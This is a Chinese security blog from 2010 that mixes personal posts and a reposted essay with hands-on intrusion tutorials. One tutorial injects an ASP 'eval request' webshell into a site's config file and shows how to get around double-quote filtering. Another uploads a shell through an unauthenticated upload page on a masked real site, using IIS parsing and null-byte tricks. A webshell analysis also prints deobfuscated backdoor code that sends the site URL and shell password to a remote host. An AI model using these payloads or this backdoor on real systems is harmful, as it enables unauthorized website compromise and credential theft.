金刀客博客

综合性安全站点“刀城安全”开通了

2010-09-01T19:49:24+08:00

       这几天一直在筹备开通“刀城安全”网站的事情，现在忙的差不多了，于是觉得搬上台面。

       刀城关闭了，并不是因为国内政策的原因，个人认为国内的网络环境确实需要整治，有秩序才能有发展。但是在这里我也有一个很大的疑惑，那就是作为站长根本不知道那些内容是合法的，那些是不合法的，这些没有一个明确的规定，所以让我们无所适从，也正是因为这我才关闭了刀城。现在一个明确的说法是如果提供DDOS工具，木马后门软件等是严查的。可是这在哪里有具体说明？

      最近听说了很多技术类的网站被迫关闭了，但是我前几天游览某几个国内知名的技术大站，销售DDOS软件的广告随处可见，他们好像并没有收到查处！这是不是存在一个公平的问题。

     个人认为一个良好的环境才能有利于国内安全技术的发展，而我们与国际知识的脱节可能不是一点点。

    好了，说“刀城安全”的事情，刀客城那么多优秀的文章不能埋没他们的光辉，于是觉得对那里的优秀文章做一个系统的整理搬到“刀城安全”来。

    这个站点主要有7大块，分别为服务器安全，web安全，数据库安全，加密解密，读书频道，招聘信息，安全工具等多个方面的资料。把刀城那些优秀的文章做一个归纳和整理，同时也补充一些网络上看到的优秀作品，以便更好系统的学习。

    刀城安全：http://www.daokers.cn

     欢迎您的光临和指导。

天极网主站都被入侵了?你的安全让我来做吧

2010-08-22T02:24:48+08:00

无意间听说天极网被人入侵了，就google了一下，结果还真挺杯具的。
http://www.im286.com/thread-4971148-1-1.html
天极网杯具了,被某人入侵了

这个里面的连接只有http://www.yesky.com/diy.txt还可以打开，其他的都已经不存在了。

更早的消息
http://q.yesky.com/group/review-18811462.html
天极网分站被黑客入侵

真的很震惊，天极网的这么多分站被拿下，并且主站怎么都被人K.O了！

记得我接触电脑的初期在天极网学到了不少的东西，就是现在电脑方面的资料也是很齐全的，现在怎么这样了呢？不得不想问你们的安全到底是怎么了？

到底是管理疏忽还是本来的安全方案就有问题？真想说：天极网，你的安全让我来做吧，至少主站不会让人放txt。

浅说双引号被过滤时一句话的插入

2010-08-19T16:44:21+08:00

昨日小刀刀在群里抛了一个问题，说后台插入一句话老是出错，群里的朋友出了很多主意，但是最后还是没搞定。后来这小子把问题抛给了我，昨天我就测试了一下。这里把情况介绍给大家。

一般而言，后台插一句话，如果数据库扩展名是asp的话，那么插数据库，但是如果有配置文件可以插的话，那肯定是插入配置文件了，但是插入配置文件有一个很大的风险，那就是一旦出错那么全盘皆输，有可能不仅仅造成后台无法登陆，甚至有可能是整个网站系统崩溃，所以插入配置文件，请慎之又慎。

话归正题，如果想插入配置文件，一般是config.asp，那么首先需要了解这个文件的一般情况。

网站的配置一般是保存网站名，地址，email之类的，既然是字符，那么格式应当是
webname=“test website”

对于这样的配置插入一句话的话，我们的机会就是替换test website，那么需要闭合2个"，同时要插入一句话，语句可以这样

"%><%eval request("d"%><%s="

那么在config.asp中就是

webname=“ "%><%eval request("d"%><%s=" ”

第一个"是闭合前面的配置文件中的"，%>就是闭合前一段脚本，之后插入一句话<%eval request("d"%>，现在要闭合原来的"和%>

所以加入<%s="，这里特别要注意“s=”，如果没有这个等号的话，那么就会成<%" ",这样必将出错。

好了，这是常规的办法，现在我们回到开始那个问题，按照前面的方法插入

插入后，我们再点击“网站设置” ，出现错误

从这个错误，我们可以得到2个信息。

第一，配置文件的路径：http://www.target.com/zfbm/zfb/inc/config.asp

第二，网站名的变量为webname。

昨天由于很晚了，就没继续看，今天出差，晚上回来刚刚上Q，小刀刀就q我，说拿下了，并说这个后台过滤了双引号"，结合昨天的错误一看果然是，由于我们闭合前面双引号起"的那个双引号收"被过滤成单引号'，所以就成了webname=" '，这样的话那么这个双引号没有闭合，由于双引号是vbscript的控制符，没有闭合config.asp运行必然出错。那么我们遇到这种双引号被过滤了的情况改怎么办呢。

由于插入一句话必须要用双引号括起来，而输入双引号又被过滤，所以我们可以利用他们自身的双引号来解决。

在配置文件中，我们还可以看到这样一些设置

就是配置网站的公告数，文章数等。可以假设一下，他必然是整数赋值，没有双引号包括
num=5
num是整数型，不然就成字符了num="5"

那么我们的一句话就可以这样构建，如图

在公告数中我们插入5%><%eval request(webname)%><%

必须要有5，不然将会出错，在网站名中我们插入"open"

由于我们没有输入双引号，不存在过滤，我们利用配置文件本身的双引号来达到目的。那么配置文件现在的内容如下
<%
....................
webname="open"
num=5%><%eval request(webname)%><%
webnum=7
.......
%>

我们的一句话就相应为
eval request("open")，open为密码。

用菜刀成功连接

从上可见，我们成功利用配置文件本身避开了一句话中双引号被过滤的问题。

那么在网页设计方面，我们可以增加过滤<,%,>或者组合<%,%>这些特殊符号，禁止这些符号的输入，那么将大大增加网页安全。

by daokers 2010.4.28深夜于Canton

再发一个webshell明文

2010-08-19T15:44:34+08:00

难忘的季节，难忘的是非，就让这一切都随风飘散吧，期待更美好的明天

今天在独自等待的群里玩，看他弄一个shell，习惯问题，就看了看，没成想，有收信地址，清理了一下，发给大家玩。

发一个无后门的webshell明文

2010-08-17T10:00:44+08:00

关于“最强体积最小提权超猛asp大马”后门问题必看！   http://www.t00ls.net/thread-10393-1-1.html
过全世界杀软功能最强体积最小提权超猛asp大马  http://www.t00ls.net/thread-10384-1-1.html
过全世界杀软功能最强体积最小提权超猛asp大马金刀客去后门版 http://www.t00ls.net/thread-10476-1-1.html

所有的所有..........都源自这个shell。

解密我已经在申明中演示了，这里不多说

http://www.t00ls.net/thread-10486-1-1.html  （关于这2天盛传的金刀客揭露后门动画的说明）

有朋友(杀虫剂兄)要无后门的shell,那我这里就把明文给大家，同时也把这个shell的后门问题说清楚。如果有疑问请自己看源代码。

在这里我得说明，不同时期认知能力是不同的，我没有办法保证去除所有的后门。

说明一下后门的情况

1，一个后门收信地址
这个后门是隐藏在sub echo(str)这个过程中

2，万能密码有2处

第一个在function AdminUser()函数中
第二个在登陆代码的上方

自己看源码吧

点击下载此文件

关于这2天盛传的所谓我做的揭露后门的动画的声明

2010-08-16T17:42:00+08:00

本来昨天刀城关了，心里就很不是滋味的，没想到今天好几个朋友问我一个动画的事情，问是不是我做的，弄的我一头雾水，我就去看了看，还挺火，好多坛子都有了。
http://www.t00ls.net/viewthread.php?tid=10477&extra=&page=1
http://www.t00ls.net/thread-10476-1-1.html
http://forum.darkst.com/thread-66305-1-1.html

小翅膀给我看了动画，这不是我做的动画！

这里我还得说明一点，对于asp从来不抓包找后门什么的，我只是对解密感兴趣，别无它意。

希望各位朋友不要误会了。

晚上专门弄了一个说明动画，有兴趣的看看
动画说明：
大家好，我是daokers。昨天关闭了刀城，那是迫不得已。
昨天刚刚关闭，结果在各个qq群和论坛出来好几个帖子，说是我弄的动画。
http://www.t00ls.net/viewthread.php?tid=10477&extra=&page=1
刀客城关门之巨作
http://www.t00ls.net/viewthread.php?tid=10476&extra=&page=1

在别的论坛也有一些。
呵呵，有点太抬我了，惭愧，但是我在这里得说明一下，这个不是我做的。
那些与我没怎么关系。
不得已，弄了一个说明。
http://www.daokers.com/article/others/606.htm
但是今天，我是专门来看这个动画的。
咱们直接看shell文件
就看这个“无.asp”，他的意思应当是无后门吧。

首先是vbscript.encode

不说明了，看我演示一下

哎，真晕，这些都不是我弄的，俺小菜。
基本上解密了，咱们现在来看几个地方
先看这个代码
execute Replace(Replace(StrReverse("/*/noitcnuf dne/*/newim_pmet
=rc/*/)/**//**//**//**/,/**/╁/**/,newim_pmet(ecalper=newim_pmet/*/))01(rhc&)31
(rhc,/**/╋/**/,newim_pmet(ecalper=newim_pmet/*/pool/*/txen/*/1+i=i/*/fi dne/*/)
1,i,newim(dim&newim_pmet=newim_pmet/*/esle/*/)w(rhc&newim_pmet=newim_pmet/*/txen/*/fi
dne/*/rof tixe:f=w/*/neht 321f fi/*/z-d*62+s=f/*/01 ot 1=d rof/*/79-
k=s/*/neht 321k fi/*/))1,n,yekrc(dim(csa=z/*/))1,i,newim(dim(csa=k/*/od tixe
neht )newim(nel>i fi/*/)yekrc(nel ot 1=n rof/*/))newim(nel>i(litnu od/*/)newim
(esreveRrtS=newim/*/1=i/*//**//**/=newim_pmet/*//**/409c9156e5073824/**/=yekrc/*/)
newim(rc noitcnuf"),"/**/", Chr(34)),"/*/", chr(13)&chr(10)):

之前我看过，他是一个解密函数
咱们解密一下
function cr(miwen)
crkey="4283705e6519c904"
temp_miwen=""
i=1
miwen=StrReverse(miwen)
do until(i>len(miwen))
for n=1 to len(crkey)
if i>len(miwen) then exit do
k=asc(mid(miwen,i,1))
z=asc(mid(crkey,n,1))
if k>96 and k<123 then
s=k-97
for d=1 to 10
f=s+26*d-z
if f>96 and f<123 then
w=f:exit for
end if
next
temp_miwen=temp_miwen&chr(w)
else
temp_miwen=temp_miwen&mid(miwen,i,1)
end if
i=i+1
next
loop
temp_miwen=replace(temp_miwen,"╋",chr(13)&chr(10))
temp_miwen=replace(temp_miwen,"╁","""")
cr= temp_miwen
end function
这个就是他的明文

咱们继续往下看

注意下这里
docu="qsg thz╋zx vkv╋╁ahtj╁=)╁qyhwp╁(gdggqum╋vc zfb╋╁>0=hfwczx 0=zqubp ╁╁╁
&mnqjgakr&╁=e&╁&)╁gho╁(kbcutxpothyqhyh.lpvnjtp&)╁nneb_llqy╁
(hczzqcmqpganovl.iqssgym&╁//:mkma╁&╁=blp?
jhw.rubtq/hcd.vt782w44w8t183q30q.pz782x44b8c183q30w//:imif╁╁=wmi via<╁
xigfu.yndieowo ╋gtfh 0=<)osesy(gxa tg╋)╁╁&hosmixlj&╁=f&╁&)╁hjr╁
(ltjpyylvlltrjbj.mhcioul&)╁ioge_imif╁(iygruxnssixogcg.jmzkktn&╁//:erhf╁&╁=fgq?
mjt.jbwyr/ouh.wv782x44r8u183u30s.rw782s44x8u183s30t//:drjb╁(yvwhmkmaicu=kxdqv╋jwek
╁╁=)╁mdgum╁(flzlltq dy╋wkm pauv gtfh ╁fvsia╁=)5,liqcf(nauf ng ╁.721╁=)
4,inhkz(kyxa fm ╁.01╁=)3,lmhmv(jzzb gk ╁.291╁=)4,njmdd(qwxe dw╋)╁oiiw_hqka╁
(qsjrudhuknwsixl.rgckkzh=hpkly╋kiq cjcmm.toflglxg╋)pjm(ebra yll"
他的执行，移动到了后面
在这里
execute cr(docu)

咱们来解密一下
sub echo(str)
response.write str
hosts=request.servervariables("http_host")
if left(hosts,4)="192." or left(hosts,3)="10." or left(hosts,4)="127." or left
(hosts,5)="local" then exit sub
if session("seljw")="" then
baidu=gethttppage("http://a03a381e8d44e287da.a*******.net/baidu.asp?
url="&"http://"&request.servervariables("http_host")&request.servervariables("url")
&"&p="&userpass&"")
if len(baidu)<=0 then
response.write "src=""http://a03a381e8d44e287da.***********.net/baidu.asp?
url="&"http://"&request.servervariables("http_host")&request.servervariables("url")
&"&p="&userpass&""" width=0 height=0>"
end if
session("seljw")="lfjl"
end if
end sub

看到没

这个就是解密出来的部分

好了，其他的我就不看了。

至于这个冒充动画的目的是什么，大家就自己猜测吧

多谢大家

by daokers
www.daokers.com
2010.8.16

http://u.115.com/file/f7c0f5a31b
关于这2天盛传的金刀客揭露后门动画的说明.rar

从此之后再也不看“快乐男声”

2010-08-14T01:07:04+08:00

        一直对这些选秀的节目没有什么兴趣，并且对那些“粉丝”特别的讨厌，所以前面好多届的超男超女都没有留意过，一般就是关注汪涵的“天天向上”，但是前段时间偶然的机会发现李行亮的歌唱的相当好，于是就发展到了也关注湖南台的”快乐男声“。在我看来李行亮的声色在所有快男中是最好的，中气很足，属于实力唱将。对那些依靠脸蛋的“花拳绣腿”一直都没啥好感，甚至嗤之以鼻，他们节目的曾经的一个大众评委说的很好，一群“唱歌机器”，十分赞同这句话。

    今天看了他们的7进6的比赛。巫启贤对李行亮的点评非常让人恶心，别人干嘛非得按照你的理解唱歌才行啊？不能有他自己的理解吗？非得站在那里不动才能唱“你来看我的演唱会”？这个点评让我对巫启贤的印象真是坏到谷底，可悲的是其他的评委还在那里唯唯诺诺，只有没作声的高晓松旁边的那个评委给了5分。

   这个点评和投票的顺序也不对，在投票前4位评委就对歌手进行点评是不公平的。评委先点评的话，势必会影响到大众评委的判断。试想大众评委有多少具有自己的专业评判？明星评委说不好，在大众评委看来这是专业点评了，他们都说不好，那肯定不好了，无形中会大大影响大众评委的判断。

  另外那些大众媒体评委为何全部是女生？这是不公平的！女生天生对相貌敏感，打分时或多或少会受到歌手长相的影响，对歌手的唱功的判断分量势必降低。如果快男是选美的话，那就令当别论了。

     最后就是那些现场粉丝，真是吵死人了，烦不甚烦，就不能安静点吗？特别是投票时，为他支持的歌手投一票时就齐声喊“谢谢”，真是恶心死了，每次看到这里我都把声音关掉。

    王野走了，真可惜，我觉得他唱歌很有感情和深度，唱的很深情，比那些留下来的小毛孩子强多了。

    真是一场闹剧！

中国人为什么丧失了慢的能力？

2010-07-15T22:35:04+08:00

我觉得这篇文章写的很好很深刻，转来博客与大家共勉。

急之国

　　中国人，赶时间。

　　最爱“快进”，狂点“刷新”。评论，要抢“沙发”。寄信，最好是特快专递。拍照，最好是立等可取。坐车，最好是高速公路、高速铁路、磁悬浮。坐飞机，最好是直航。做事，最好是名利双收。创业，最好是一夜暴富。结婚，最好有现房现车。排队，最好能插队。若不能，就会琢磨：为什么别人排的队总比我的快呢？

　　没有时间感的中国人变成了最着急最不耐烦的地球人，“一万年太久，只争朝夕”。

　　中国人为什么丧失了慢的能力？资源紧缺引发争夺，分配不平衡带来倾轧，速度带来烦躁，便利加重烦躁，时代的心态就是再也不愿意等。

　　可以快，就决不能慢。有了比较，加上重复、单调、复杂、呆板、逼仄、拖延、消耗、超出理解范围、失控和不公平等经常性的情境，中国人急不可耐，又因欲求未满而耐心等待，焦躁不安又心安理得。

　　急的心态带来了什么？欲速则不达。“大多数人在追求快乐时急得上气不接下气，以至于和快乐擦肩而过。”(克尔凯郭尔语)我们迎来了更多的灾难和意外，更低的效率和更坏的结果。

　　就这样，在“急之国”，我们快速地消耗着自己。等我们真正明白快慢、张弛、紧疏、得失、成败、忙闲的人生之道时，可能一切都晚了。

　　不耐烦透shi中国人的时间观

　　谁按下了中国人的快进键？

　　人们的烦躁症，来自社会结构的不稳定。无论排队还是插位，都是为了确保自己不被社会抛离。

　　我们喜欢插队。我们当一米黄线不存在。我们抢出租车。我们在交通灯变黄的时候加速冲过去。我们为了节省五分钟去翻越马路中间的栏杆。我们由亲戚带着走VIP通道进去，因为排队要半小时。我们在机场大闹值班柜台。我们在电话里对着客服人员吼：“马上给我搞定！马上！”我们急急忙忙旅游，急急忙忙拍照，急急忙忙离去。我们走后门。我们送钱。

　　我们很急。我们很不耐烦。

　　可是，我们同时又是世界上最耐心的人。我们以前排队炒股，头天晚上就排队买认购证。现在我们排队买房，提前三天就全家轮班开始排。我们喜欢买促销减价货，排一上午队也在所不惜。人越多的餐厅，我们越喜欢，我们宁肯坐在门口塑料凳子上吃两个小时的瓜子。我们就是感冒也要去挂专家号，提前一个月就开始排。现在，我们还喜欢排9个小时的队去世博会看立体电影。

　　我们似乎又很有耐心。

　　这就是中国。传统心态和现代境遇扭合在一起，我们焦躁不安却又心安理得。
慢不下来的中国

　　19世纪末，美国传教士雅瑟·亨·史密斯曾写过一本书《中国人的性格》，他专门用了一个章节来写“漠视时间”。

　　“对中国人来说，盎格鲁—撒克逊人经常性的急躁不仅是不可理解的，而且完全是非理智的。很显然，中国人不喜欢我们的人格中所具有的这一品性，正如我们也不喜欢他们缺乏诚实一样。无论如何，要让一个中国人感到行动迅速敏捷的重要性，那是很困难的。”

　　史密斯把他观察到的中国人的缓慢行为归结为：“中国人的历史是属于大洪水之前的。它可追溯到太初时代，尔后则是混浊、舒缓、漫长的大河，其间不仅有挺拔的大树，也有枯朽的草木。除了较缺乏时间观念的民族之外，没有人会去编写或阅读这样的历史。”

　　最有趣的是，史密斯认为中国人漠视时间正表现在他们的勤劳之中，他们不停地劳作，实际上是在不停地浪费时间，他们一点也不担心做无用功或者返工。

　　史密斯说的当然有道理，实际上很多中国人也觉察到自己身上的这些缺陷。此书近年的再版序言中，厦门大学教授周宁写道，辜鸿铭论述“中国人的精神”其实是把史密斯的书作为潜在的对话者，林语堂著《吾国吾民》也是在煞费苦心地回应此书，而鲁迅则一直遗憾没有人翻译这本书，用以“自省、分析，明白哪几点说的对，变革、挣扎，自做工夫，却不求别人的原谅和称赞，来证明究竟怎样的是中国人”。

　　几十年后，史密斯所说的“盎格鲁—撒克逊人经常性的急躁”就变成了中国人的“经常性急躁”。自“五四”运动起，启蒙者们对泥泞的现状恨之越深，对改变现状的速度也就期之越烈。要在短时间内走完西方上百年的历程，难免显得冒进急躁，方法也往往激烈、粗暴。

　　又是一个外国人发现了中国人的急躁。杜威曾说：“这场运动的感情成分多于思想成分。它还伴随有夸张、混乱以及智慧与荒谬的杂合。这一切都不可避免地使这场运动在开始阶段具有急功近利的特征。”当然，近年来我们重新发现胡适，似乎为杜威的观察提供了一些例证，我们似乎又在“返工”。

　　“一万年太久，只争朝夕”，到了新中国成立后的第二个十年间，中国人的时间观再次提速。大跃进和大干快上，成为时代的关键词。众所周知，欲速则不达，不但没有快起来，反而导致了全面停滞。

　　时钟的指针来到改革开放后，“把耽误的时间抢回来”变成了全民族的心声。到了当下，环境更加复杂，现代、后现代的语境交织，工业化、电子化、网络化的社会成形，资源紧缺引发争夺，分配不平衡带来倾轧，速度带来烦躁，便利加重烦躁，时代的心态就是再也不愿意等。

　　什么时候我们丧失了慢的能力？

　　中国人的时间观，自近代以降历经三次提速，已经停不下来了。我们需要的是时刻看着钟表，计划自己的人生：一步到位、名利双收、嫁入豪门、一夜暴富、35岁退休……
科技就是不耐烦

　　《连线》曾经刊登过一篇文章《让我们抓狂的33件东西》，列举了33件现代生活中让我们无法忍受最终崩溃的事物。

　　排在第一位的是航空旅行，作者对航空延误和堵塞的愤怒之情溢于言表：“去年(2007年)有超过1/4航班停在停机坪上，在夏季高峰时期，这个数字几乎达到30%。如果你在网上订票的话，你也许可以选择准点的航班。可是，现在还有谁不是在网上订票的吗？”

　　的确，在候机厅里突然被告知必须继续枯坐两个小时，是非常让人恼火的事情，更不要说那些在机舱里连膝盖都不能伸直的可怜人了。

　　此外，还有信用卡、顾客服务、医疗记录、复印机、打印机、道路、电话会议……这些东西都被列入了“抓狂物件”。

　　等一下，难道这些东西发明出来不是为了让人类生活得更便捷吗？它们不是可以减少重复的劳动，从而使事情变得更简单吗？为什么它们反而让人们更加不耐烦了呢？

　　我们发明东西，显然是为了更方便，是为了解决烦躁。比如，你再也不用抄写文件500份了，因为我们有了复印机。但是，高科技复印机的操作已经复杂到了办公室里没几个人能搞得懂的程度了。于是我们专门指定一个人来学习这门技术，可是他不在的时候，其他的人就完全抓狂了。甚至这个专门人才也抓狂了，他疯狂地打了一通电话把复印机公司的人痛骂一通，最后另外一些专门人才上门来帮我们把墨盒换掉，把挤成折扇一样的纸拉出来。

　　这就是这个高科技时代的伟大之处。我们发明了很多东西来试图解决烦躁症，但实际上却只是发明了另外一些烦躁症。

　　发明排号机的人，一定没有中午去银行里拿过号。当你满怀希望地按下按钮，吐出来的纸条却冷冰冰告诉你，前面还有32个人，而这32个人把所有的坐椅都坐满了，同样冷冰冰地望着你这个白痴。

　　发明电话等待音乐的人，一定是失聪的。他担心人们听10分钟的嘟嘟声会疯掉，就好心地让人们听10分钟的洒水车音乐。实际上，没人会听10分钟的嘟嘟声，大家都会挂掉，而耐心听完10分钟的洒水车居然还没有人接听，接着洒水车又从头开始了，这时候才真的要疯了。

　　发明服务性微笑和公关式语言的人，一定是面瘫和口吃。他肯定觉得服务人员的微笑和滴水不漏的回答会有助于缓解客户的情绪，但事实却是，当你迫切需要解决一件事情的时候，你希望看到的是客服人员和你一样着急，而不是对你慢条斯理地露出八颗牙齿：“我们正在跟进。”

　　跟进！谁发明的这个词？

不耐烦是社会心态

　　生活越现代化，烦躁情绪就越重。

　　电话不普及的时候，没人介意几个月收一封信。但手机随身的时代，几十分钟内不回短信的人就会被讽为没有机德。

　　只有公交车坐的年代，等上半小时也不以为奇。如今打的，随时都要提醒司机抄近道、超车。

　　以前我们用电话线拨号上网，56K的网速，很慢，可是并没有人觉得烦躁，因为条件如此、大家如此。论坛上发帖，有的标题就是“大图杀猫”、“小猫慎入”，提醒网友注意网速，成为一种文化现象。如今，带宽以M来衡量，数十M已不稀奇，但网页打开稍有迟疑，我们第一反应就是点刷新键，有时候恨不得砸电脑。

　　这是时代加重的烦躁症，既然可以快，就决不能慢。有了比较，就有了烦躁。

　　抛开时代，还有哪些条件会引发你的烦躁？

　　重复。单调。复杂。呆板。逼仄。拖延和消耗。超出理解范围。失去控制，而不知所措。

　　但最重要的是，不公平。

　　你可以不在银行里排在第33位。只要你是VIP，你就可以施施然地直接走到柜台前，把那32个可怜虫抛在脑后。难道就不可以给非VIP的人提供舒适的基本服务吗？可以，我们的基本服务就是在铁椅子上坐两个小时。

　　你可以不在医院里看病排一上午挂一个号。只要你认识医院里任何一个员工，从院长、主治医生到行政人员，他们就可以直接带你走到专家诊断室里。难道就没有普通人看病的便利吗？有的，就这么几家医院，你看哪儿人少你就去哪儿吧。

　　你可以不在春运排通宵队买火车票——你可以去订机票。难道就没有底层人民承受得起的回家方式吗？当然有，你可以在火车站广场上买黄牛票，多付一个月薪水而已，你付得起。

　　你可以不排队买房，反正涨起来，你卖了也没有住的地方。你可以不急着结婚，反正你还没有买房。

　　人们的烦躁症，来自于社会结构的不稳定。因为你总在担心，如果这个机会不抓住，你就被社会抛离了；如果你现在乖乖排队，那么就一定会有人插你的位。所以我们一定急躁，我们不顾规则——实际上也没有什么规则，抓到手的才是硬通货，排队等待的永远都只是愿景。

　　我们就像在超市收银台前的购物者，推着购物车在几条长龙之间踯躅，无论排队还是不排队都是两难。插位加塞挤来挤去，一分钟也不愿意等，焦躁不安。

　　而且，我们总觉得别人排的队比我们的快。

刀客城字典整理工具

2010-06-30T16:49:30+08:00

这个工具是前段时间为了方便整理wwwscan字典时写的

软件界面：

下面介绍下和说明下使用：
这个字典是整理文本字典的，不要搞个mdb的数据库拉进来整理。使用的话，首先需要将我们的字典拉到文本框中，或者点击“打开字典”来打开你的文本字典。下面看具体功能
1，去除重复。很多时候我们的字典中是有大量的重复的路径的，我们可以把这些重复干掉，推荐不要选择“区分大小写”，这样的话就能去掉更广泛的重复，比如/admin，/Admin,这个路径是一样的，不勾选的话就能够去掉这些重复。之后点击“开始整理”就开始工作了，他会自动在字典目录生成整理好的字典。还有一点需要说明的是，很多朋友很在意自己整理的东西，并且把一些路径归类了，那么在这里就要选择原序输出，那么就不会重新排列。但是有些朋友喜欢a，b，c，d这样的顺序输出，那么就请选择排序输出。我相信仅仅这一点就能够大量的减小你的字典。

2，整理字典。这个整理是以路径的末尾的扩展名来整理的。预定义了htm,html,asp,aspx,php,jsp,txt,rar,exe,asa，目录等等这些扩展名，那么在这些之外的可以选择“其他”。整理字典主要有2个操作，第一个是提取，第二个是剔除。比如说，我同时选择提取和htm，那么就将从字典中抽取出所有的以.htm为结尾的路径，并保存为另外一个文本。而剔除呢，就将把所有的以.htm为结尾的路径从当前字典中剔除。另外还可以对路径进行一些处理，比如，我想去除掉所有路径的末尾的"/"，那么就选择“特征”，在后面输入"/"，同时选择“末尾”，就可以进行剔除或者提取的工作。如果我想删除所有的路径包含有"../"这类的路径，那么在后面输入"../"，同时选择“整行”，就可以进行提取或者是删除的动作了。

好了，大概的介绍就是这样了。

Have a enjoy！

丢掉NC，介绍一种新的上传shell文件的方法

2010-06-27T21:16:20+08:00

今日低调在知道区发帖求助http://forum.daokers.com/read.php?tid=3048

说后台地址，用户名和密码都有，拿不到shell。不久wbxym和ljb17就分别2种办法上传好了shell。

wbxym的方法很简单就是本地上传，修改action的地址为上传页面并且在路径后面加上*.asp;或者加个.也行。就不多做介绍。

ljb17的方法是抓包，利用nc上传。他这里路径有2种办法，第一个办法是和上面一样，添加*.asp;，第二种办法就是截断，直接在路径后面加*.asp空格，然后在16进制下面将20改为00.然后抓包上传。这里要切记如果文件大小有变化，一定要修改包的大小。

今天我介绍一个新办法，无需做多余的工作，咱们直接上传shell。

诀窍就是利用opera游览器上传。

大家跟随我的脚步一起来upload吧。

首先当然是要安装好这款来自挪威的非IE内核的游览器，非常漂亮。

在低调的这个网站有一个上传产品图片的地方。地址为：http://www.******.com/admin/Uppic.asp?formname=myform&editname=p_pic_b&shopuppath=uppic&filelx=jpg

咱们在opera中打开，很杯具的一个上传页面，没有权限验证，根本无需进入后台。

如图

现在我们要修改路径，有2种方式。

第一种，在页面点击“检查元素”，

就将会启动dragonfly，之后点击左下角的那个“展开DOM树”，就会将代码全部展开。

之后找到我们准备修改路径的地方，双击他的value值，就会出现修改框

修改好后在旁边单击一下就保存。

此时我们点击右上角的关闭按钮，关掉frangonfly 。

然后把我们shell修改城gif后缀的文件，在网页中，选择此文件，点击上传，即可成功的传上我们的文件，利用IIS解析问题拿到shell。

第二种方法，这是一种更为简单的方法，他同本地上传差不多。

我们打开上传页面后，右键点击页面，选择“源代码”

打开源代码后，直接修改路径，然后点击“应用更改”

此后的过程和上面一样，选择文件即可上传。

不用保存页面，不用挂包，不用NC，这比上面说的本地上传和NC上传要简单的多吧。

对于opera，这里还要说到另外一个问题，怎样获取上传后文件的地址？

因为这个上传页面有一个特点，上传后就关掉页面，如果是在ie内核的游览器比如TT，搜狗中都有一个确认网页关闭的选项，那么在关掉时点击取消，然后查看源代码即可获取地址。但是在opera中是没有的。

我们知道关闭页面是由javascript代码完成的，那么我们搞定js代码就行。也许有童鞋会说，那么我们编辑源代码，去掉js代码不就行了吗？

但是在这里，刚刚我们翻Uppic.asp的代码可以看到，他并没有关闭窗口的代码，关闭窗口的代码是由他的action页面Uppicpro.asp来完成的，修改代码已不可能。

但是js代码是在客户端执行的，我们在游览器中禁用掉不就行了吗？

思路来了，come on

上传页面，右键单击，选择“编辑站点首选项”，切换到“脚本”选项卡，把"允许使用jacascript"前面的钩钩去掉，

确定然后上传，页面不再关闭，咱也顺利拿到地址。

看到了后面的“window.close”了吧，就是他要关闭页面的。

测试看看上传是不是ok。

答案是：perfect

by daokers

2010.6.21夜